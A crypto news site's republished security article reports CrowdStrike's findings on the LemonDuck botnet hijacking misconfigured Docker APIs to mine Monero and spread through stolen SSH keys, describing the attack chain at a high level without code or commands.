news4global
  • Home
  • Bitcoin
  • Blockchain
  • Business
  • Latest news
  • Market
  • Regulation
  • VideosHot
    Terra Luna News Today | Rajeev Anand | Crypto News Today | Cryptocurrency News Today | Crypto Marg

    Terra Luna News Today | Rajeev Anand | Crypto News Today | Cryptocurrency News Today | Crypto Marg

    Poilievre's position on cryptocurrency criticized | CPC leadership debate

    Poilievre's position on cryptocurrency criticized | CPC leadership debate

    CRYPTO IS BLOODY RIGHT NOW! IS CRYPTO CRASHING? ARE WE IN THE MIDDLE OF A CRYPTO CRASH?!

    CRYPTO IS BLOODY RIGHT NOW! IS CRYPTO CRASHING? ARE WE IN THE MIDDLE OF A CRYPTO CRASH?!

    Why Terra Luna Dump hard ? | Reason..

    Why Terra Luna Dump hard ? | Reason..

    Michael Saylor Reacts To Bitcoin Crash And Inflation

    Michael Saylor Reacts To Bitcoin Crash And Inflation

    Is LUNA Fueling the Crypto Crash?

    Is LUNA Fueling the Crypto Crash?

    What exactly is Putin's 'doomsday plane'?

    What exactly is Putin's 'doomsday plane'?

    Why Generation Z is about to become the RICHEST Generation | Crypto Investing w Miss Teen Crypto

    Why Generation Z is about to become the RICHEST Generation | Crypto Investing w Miss Teen Crypto

    XRP SELL WARNING!!! *EMERGENCY* (DO THIS NOW!!!!!)

    XRP SELL WARNING!!! *EMERGENCY* (DO THIS NOW!!!!!)

No Result
View All Result
  • Home
  • Bitcoin
  • Blockchain
  • Business
  • Latest news
  • Market
  • Regulation
  • VideosHot
    Terra Luna News Today | Rajeev Anand | Crypto News Today | Cryptocurrency News Today | Crypto Marg

    Terra Luna News Today | Rajeev Anand | Crypto News Today | Cryptocurrency News Today | Crypto Marg

    Poilievre's position on cryptocurrency criticized | CPC leadership debate

    Poilievre's position on cryptocurrency criticized | CPC leadership debate

    CRYPTO IS BLOODY RIGHT NOW! IS CRYPTO CRASHING? ARE WE IN THE MIDDLE OF A CRYPTO CRASH?!

    CRYPTO IS BLOODY RIGHT NOW! IS CRYPTO CRASHING? ARE WE IN THE MIDDLE OF A CRYPTO CRASH?!

    Why Terra Luna Dump hard ? | Reason..

    Why Terra Luna Dump hard ? | Reason..

    Michael Saylor Reacts To Bitcoin Crash And Inflation

    Michael Saylor Reacts To Bitcoin Crash And Inflation

    Is LUNA Fueling the Crypto Crash?

    Is LUNA Fueling the Crypto Crash?

    What exactly is Putin's 'doomsday plane'?

    What exactly is Putin's 'doomsday plane'?

    Why Generation Z is about to become the RICHEST Generation | Crypto Investing w Miss Teen Crypto

    Why Generation Z is about to become the RICHEST Generation | Crypto Investing w Miss Teen Crypto

    XRP SELL WARNING!!! *EMERGENCY* (DO THIS NOW!!!!!)

    XRP SELL WARNING!!! *EMERGENCY* (DO THIS NOW!!!!!)

No Result
View All Result
news4global
No Result
View All Result
Home Bitcoin

LemonDuck botnet plunders Docker cloud instances in cryptocurrency crime wave

April 22, 2022
Reading Time: 2 mins read
0
LemonDuck botnet plunders Docker cloud instances in cryptocurrency crime wave
189
SHARES
1.5k
VIEWS
Share on FacebookShare on Twitter

Related articles

GPU Manufacturers Expect Availability And Price Changes

GPU Manufacturers Expect Availability And Price Changes

May 18, 2022
How Cryptocurrency And The Blockchain Are Transforming Forex

How Cryptocurrency And The Blockchain Are Transforming Forex

May 18, 2022

Operators of the LemonDuck botnet are targeting Docker instances in a cryptocurrency mining campaign.

LemonDuck is cryptocurrency mining malware wrapped up in a botnet structure. The malware exploits older vulnerabilities to infiltrate cloud systems and servers, including the Microsoft Exchange ProxyLogon bugs, EternalBlue, and BlueKeep.

As noted by Microsoft’s security team in 2021, the threat actors behind the malware are known to be selective when it comes to timing and may trigger an attack when teams are focused on “patching a popular vulnerability rather than investigating compromise.”

LemonDuck has expanded its operations from Windows machines also to include Linux and Docker. In an ongoing, active campaign, Crowdstrike says that Docker APIs are being targeted to obtain initial access to cloud instances.

Docker is used for running containers in the cloud. On Thursday, the cybersecurity researchers said that LemonDuck will take advantage of misconfigurations in instances that cause API exposure to deploying exploit kits and load malware.

In a case observed by the team, an exposed API was abused to run a custom Docker ENTRYPOINT instruction and download “core.png,” an image file disguised as a Bash script.

The file was downloaded from a domain in LemonDuck’s “vast” command-and-control (C2) infrastructure.

“CrowdStrike found multiple campaigns being operated via the domain targeting Windows and Linux platforms simultaneously,” the researchers noted.

Core.png will launch a Linux cronjob inside the vulnerable container and then download a secondary Bash file, “a.asp,” the main LemonDuck payload.

The cronjob will trigger LemonDuck. The malware will first kill several processes, including network connections, rival cryptocurrency mining operations, and existing ties to mining pools. LemonDuck will also target known daemons tasked with monitoring, such as Alibaba Cloud’s monitoring service.

Now the server has been prepared, a cryptocurrency mining operation begins. XMRig used to generate Monero (XMR), is launched with a configuration set to proxy pools — an attempt to hide the true cryptocurrency wallet address of the attacker.

LemonDuck doesn’t stop at just one Docker instance, however. The malware will also search for SSH keys in the file system to log into other servers and repeat its malicious operations.

“Due to the cryptocurrency boom in recent years, combined with cloud and container adoption in enterprises, cryptomining is proven to be a monetarily attractive option for attackers, the researchers say. “Since cloud and container ecosystems heavily use Linux, it drew the attention of the operators of botnets like LemonDuck, which started targeting Docker for cryptomining on the Linux platform.”

See also


Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0


Share76Tweet47

Related Posts

GPU Manufacturers Expect Availability And Price Changes

GPU Manufacturers Expect Availability And Price Changes

by admin
May 18, 2022
0

Image: Fox / Matt Groening / KotakuWith an ongoing chip shortage that’s impacting basically everything that requires silicon and, everyone’s...

How Cryptocurrency And The Blockchain Are Transforming Forex

How Cryptocurrency And The Blockchain Are Transforming Forex

by admin
May 18, 2022
0

Forex has long been one of the major focal points in the world of finance. Then Bitcoin was introduced in...

MKR Crypto Defies Market Turbulence With 30% Gain on the Week

MKR Crypto Defies Market Turbulence With 30% Gain on the Week

by admin
May 17, 2022
0

Maker’s (MKR-USD) MKR crypto is seeing shine as it posts a 30% gain over the last seven days This upward...

How Bitcoin Should Be Upgraded In The Future

How Bitcoin Should Be Upgraded In The Future

by admin
May 16, 2022
0

One of the most contentious questions in Bitcoin over the last five years has been how to activate soft forks....

Coinbase: the AWS of Crypto

Coinbase: the AWS of Crypto

by admin
May 16, 2022
0

On today’s episode of “Empire,” Joe Lallouz, head of Coinbase Cloud, joins Jason and Santiago to discuss how Coinbase Cloud...

Load More
  • Trending
  • Comments
  • Latest

Bitcoin Is ‘Definitely Not a Fraud,’ CEO of Mobile-Only Bank Revolut Says

March 2, 2022

Bitcoin’s Main Rival Ethereum Hits A Fresh Record High: $425.55

March 3, 2022
How online shopping has changed over the last 30 years | National

How online shopping has changed over the last 30 years | National

April 6, 2022

India: Bitcoin Prices Drop As Media Misinterprets Gov’s Regulation Speech

March 4, 2022

US Commodities Regulator Beefs Up Bitcoin Futures Review

0

Bitcoin Hits 2018 Low as Concerns Mount on Regulation, Viability

0

India: Bitcoin Prices Drop As Media Misinterprets Gov’s Regulation Speech

0

Bitcoin’s Main Rival Ethereum Hits A Fresh Record High: $425.55

0
How to avoid ‘rug pulls,’ the latest cryptocurrency scam | Business News

How to avoid ‘rug pulls,’ the latest cryptocurrency scam | Business News

May 18, 2022
From bags to pet food, businesses in Singapore allow customers to pay with crypto

From bags to pet food, businesses in Singapore allow customers to pay with crypto

May 18, 2022
Crypto Coin Coach on Why NFT Projects like Cryptopunks and BAYC are a Huge Success

Crypto Coin Coach on Why NFT Projects like Cryptopunks and BAYC are a Huge Success

May 18, 2022
GPU Manufacturers Expect Availability And Price Changes

GPU Manufacturers Expect Availability And Price Changes

May 18, 2022

Latest News

How to avoid ‘rug pulls,’ the latest cryptocurrency scam | Business News

How to avoid ‘rug pulls,’ the latest cryptocurrency scam | Business News

May 18, 2022
From bags to pet food, businesses in Singapore allow customers to pay with crypto

From bags to pet food, businesses in Singapore allow customers to pay with crypto

May 18, 2022

Categories

Site Navigation

  • Home
  • About us
  • Contact us
  • Privacy policy
  • Terms and services
  • Home
  • About us
  • Contact us
  • Privacy policy
  • Terms and services

© 2022 Designed by news4global

No Result
View All Result
  • Home
  • Bitcoin
  • Blockchain
  • Business
  • Latest news
  • Market
  • Regulation
  • Videos

© 2022 Designed by news4global